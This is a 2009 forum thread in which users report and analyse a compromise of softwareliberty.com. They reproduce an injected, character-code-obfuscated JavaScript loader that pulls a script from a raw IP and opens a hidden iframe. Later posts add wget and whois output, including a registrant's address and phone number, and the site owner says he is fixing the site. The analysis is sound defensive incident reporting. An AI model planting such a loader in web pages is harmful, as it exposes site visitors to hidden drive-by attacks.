Please make softwareliberty.com safe again!

5 replies [Last post]

Wed, 2009-04-22 14:32

Offline

Joined: 2007-09-10

Posts:

As I pointed out here: http://www.nuxified.org/topic/handing_glm_work_over_another_organization#comment-12996
softwareliberty.com is not safe.

Now I'm no expert in web security, but I think if the .html code has been changed, the server has been compromised...

I made a little investigation to see what exactly happens there:
The html code of the page contains a javascript part which gets a script stat.js from http://84.244.138.55/stats/stat.js

The code in index.html:

<script language="javascript">
<!--
var s="",i,c=0,o="";
var str="60|115|99|114|105|112|116|32|116|121|112|101|61|34|116|101|120|116|47|106|97|118|97|115|99|114|105|112|116|34|32|115|114|99|61|34|104|116|116|112|58|47|47|56|52|46|50|52|52|46|49|51|56|46|53|53|47|115|116|97|116|115|47|115|116|97|116|46|106|115|34|62|60|47|115|99|114|105|112|116|62|";
l=str.length;
for(c=0;c<=str.length-1;c++){
while(str.charAt(c)!='|')s=s+str.charAt(c++);
o=o+String.fromCharCode(s);
s="";}
document.write(o);
-->
</script>

Becomes this:

<script language="javascript">
document.write("<script type="text/javascript" src="http://84.244.138.55/stats/stat.js"></script>");
</script>

Currently (may have been different before), stats.js looks like this:

document.open();
document.write('<iframe src="http://84.244.138.55/ts/in.cgi?sltest" WIDTH="0%" HEIGHT="0%" MARGINHEIGHT="0" MARGINWIDTH="0" SCROLLING="auto" frameborder="0" NORESIZE></iframe>');
document.close();

Which seems to set up an invisible frame showing http://84.244.138.55/ts/in.cgi?sltest , which is currently a page looking like google.com but with some scripts inside it I haven't figured out yet. The page as well as stat.js may have changed anyway since google detected it as an attack site.

I attached all relevant files below, as well as a quick python script I used to decrypt the ascii (main code from http://love-python.blogspot.com/2008/04/convert-text-to-ascii-and-ascii-to-text.html).

Attachment	Size
ascii_decoder.py_.txt	1.33 KB
index.html	5.96 KB
stat.js_.txt	215 bytes
index.html.1	4.94 KB
index.html.1.simplified.txt	4.94 KB
secret.txt	283 bytes
decoded.txt	118 bytes

Wed, 2009-04-22 15:09

KIAaze

Offline

Joined: 2007-09-10

Posts:

It turns out

It turns out http://84.244.138.55/ts/in.cgi?sltest actually redirects directly to google.com. ^^
So index.html.1 is just a normal google page with google scripts.

$wget "http://84.244.138.55/ts/in.cgi?sltest"
--2009-04-22 17:02:13--  http://84.244.138.55/ts/in.cgi?sltest
Connecting to 84.244.138.55:80... connected.
HTTP request sent, awaiting response... 302 Found
Location: http://www.google.com [following]
--2009-04-22 17:02:13--  http://www.google.com/
Resolving www.google.com... 74.125.39.99, 74.125.39.106, 74.125.39.105, ...
Connecting to www.google.com|74.125.39.99|:80... connected.
HTTP request sent, awaiting response... 302 Found
Location: http://www.google.de/ [following]
--2009-04-22 17:02:13--  http://www.google.de/
Resolving www.google.de... 74.125.39.104, 74.125.39.99, 74.125.39.106, ...
Reusing existing connection to www.google.com:80.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: `index.html.4'
    [ <=>                                                                                                                                                                  ] 5,028       --.-K/s   in 0.03s

2009-04-22 17:02:13 (157 KB/s) - `index.html.4' saved [5028]

A little diff test (it makes no difference whether it's another wget google.com or a wget 84.244.138.55/ts/in.cgi?sltest):

$diff index.html.7 index.html.8
1c1
< <html><head><meta http-equiv="content-type" content="text/html; charset=ISO-8859-1"><title>Google</title><script>window.google={kEI:"bjLvScaeMNCNsAaEzcmPBw",kEXPI:"17259,20257",kHL:"de"};
---
> <html><head><meta http-equiv="content-type" content="text/html; charset=ISO-8859-1"><title>Google</title><script>window.google={kEI:"cDLvSfrHEI-ysAbB4YyDBw",kEXPI:"17259,20257",kHL:"de"};

Wed, 2009-04-22 18:16

reptiler

Offline

Joined: 2006-03-28

Posts:

Here's what a really quick

Here's what a really quick check revealed:

[dennis@thinkpad ~]$ host 84.244.138.55
55.138.244.84.in-addr.arpa domain name pointer web.xxxgallz.com.

[dennis@thinkpad ~]$ whois 84.244.138.55                    
[Querying whois.ripe.net]                                   
[whois.ripe.net]                                            
% This is the RIPE Whois query server #2.                   
% The objects are in RPSL format.                           
%                                                           
% Rights restricted by copyright.                           
% See http://www.ripe.net/db/copyright.html                 

% Note: This output has been filtered.
%       To receive output for a database update, use the "-B" flag

% Information related to '84.244.138.0 - 84.244.138.127'

inetnum:        84.244.138.0 - 84.244.138.127
netname:        Serverboost-2                
descr:          IP Space provided by We Dare 
country:        NL                           
admin-c:        Sr4706-RIPE                  
tech-c:         Sr4706-RIPE                  
status:         ASSIGNED PA                  
mnt-by:         WEDARE-MNT                   
source:         RIPE # Filtered              

role:           Serverboost role
address:        Piet Paaltjensplein 62
address:        3027 TZ Rotterdam     
address:        The Netherlands       
phone:          +31 (0)6 1482 4915    
abuse-mailbox:    
admin-c:        JM6856-RIPE           
tech-c:         JM6856-RIPE           
nic-hdl:        Sr4706-RIPE           
mnt-by:         MNT-I3D               
source:         RIPE # Filtered       

% Information related to '84.244.128.0/18AS20495'

route:        84.244.128.0/18
descr:        Route to first IP-numberblock We Dare BV
origin:       AS20495                                 
mnt-by:       WEDARE-MNT                              
source:       RIPE # Filtered                         

% Information related to '84.244.128.0/19AS20495'

route:          84.244.128.0/19
descr:          We Dare B.V.   
origin:         AS20495        
mnt-by:         WEDARE-MNT     
source:         RIPE # Filtered

[dennis@thinkpad ~]$ whois xxxgallz.com
[Querying whois.verisign-grs.com]      
[Redirected to whois.rrpproxy.net]     
[Querying whois.rrpproxy.net]          
[whois.rrpproxy.net]                   
; This data is provided by Transip BV  
; for information purposes, and to assist persons obtaining information
; about or related to domain name registration records.                
; Transip BV does not guarantee its accuracy.                          
; By submitting a WHOIS query, you agree that you will use this data   
; only for lawful purposes and that, under no circumstances, you will  
; use this data to                                                     
; 1) allow, enable, or otherwise support the transmission of mass      
;    unsolicited, commercial advertising or solicitations via E-mail   
;    (spam); or                                                        
; 2) enable high volume, automated, electronic processes that apply    
;    to this WHOIS server.                                             
; These terms may be changed without prior notice.                     
; By submitting this query, you agree to abide by this policy.         

DOMAIN: XXXGALLZ.COM

RSP: Transip BV 
URL: http://www.transip.nl/

owner-contact: P-DQA565
owner-organization: ardon, d
owner-fname: D              
owner-lname: ardon          
owner-street: eessenkamp 8  
owner-city: wapenveld       
owner-zip: 8191             
owner-country: NL           
owner-phone: +31388442066   
owner-email: 

admin-contact: P-DQA565
admin-organization: ardon, d
admin-fname: D              
admin-lname: ardon          
admin-street: eessenkamp 8  
admin-city: wapenveld
admin-zip: 8191
admin-country: NL
admin-phone: +31388442066
admin-email: 

tech-contact: P-DQA565
tech-organization: ardon, d
tech-fname: D
tech-lname: ardon
tech-street: eessenkamp 8
tech-city: wapenveld
tech-zip: 8191
tech-country: NL
tech-phone: +31388442066
tech-email: 

billing-contact: P-DQA565
billing-organization: ardon, d
billing-fname: D
billing-lname: ardon
billing-street: eessenkamp 8
billing-city: wapenveld
billing-zip: 8191
billing-country: NL
billing-phone: +31388442066
billing-email: 

nameserver: ns1.exmasters.com
nameserver: ns2.exmasters.com

; Transip BV
; Real-time domeinregistratie en -beheer vanaf 4.99 Euro!
; http://www.transip.nl/products/domain/

Fri, 2009-05-08 11:48

Gustavo

Offline

Joined: 2006-09-11

Posts:

I'm fixing this right now.

I'm fixing this right now. softwareliberty.com is still hosted in our shared host at DreamHost and it got hacked (well, nothing else can explain this; neither Olivier or I would do this), so I'm moving it to our dedicate server.

I forgot that KIaze reported this in another thread, sorry. I started working on this because of https://tracker.gnulinuxmatters.org/ticket/326

Thank you, reptiler and KIAaze.

Tue, 2009-05-12 08:33

KIAaze

Offline

Joined: 2007-09-10

Posts:

Thanks for fixing it. It's

Thanks for fixing it.
It's now 100% fixed since Google doesn't mark it as an attack site anymore.

I'll remember to use the GLM tracker (or the mailing-list) instead of the forum next time.

By the way: How dangerous is it to be redirected to Google from another server?
Can they somehow intercept authentication data when you have a Google account for example?

Mon, 2009-11-16 18:15

KIAaze

Offline

Joined: 2007-09-10

Posts:

Re: Please make softwareliberty.com safe again!

The bugtracker being a little bit slow, I'll post here again.
http://www.softwareliberty.com/ seems to have been hacked again.

I started directing people directly to the FSF site instead because of this.
Hopefully, this will never happen to http://linuxpreloaded.com/ because I don't know any equivalent for it. ( Bought myself a new GNU/Linux preloaded PC through it from http://www.i-ventive.com/ )

(If softwareliberty can't be made safe, it would be nice to remove/replace all links to it from the other GLM sites.)